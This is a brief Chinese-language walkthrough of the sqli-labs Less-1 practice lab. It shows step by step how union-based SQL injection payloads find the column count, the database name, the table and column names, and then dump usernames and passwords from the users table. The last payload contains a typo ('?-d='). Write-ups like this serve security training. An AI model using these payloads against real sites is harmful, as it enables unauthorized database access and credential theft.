sql注入之sqli-labs-less-1 错误注入

输入?id=1 得到登录页面：

通过order by 函数试探：

5的时候报错

试探到3 的时候返回正确的值：

然后继续注入：?id= -1 ' union  select 1,2,3 --+ 查看回显点：

开始查看数据库内容：id=-1' union select 1,database(),3 --+

得到当前数据库是security

查询数据库里面的表内容：

id=-1%27%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema=database()%20--+

查询表里面的列名：

?id=-1 'union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'%20--+

查询字段详细内容：payload:

?-d=-1' union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)from users %20--+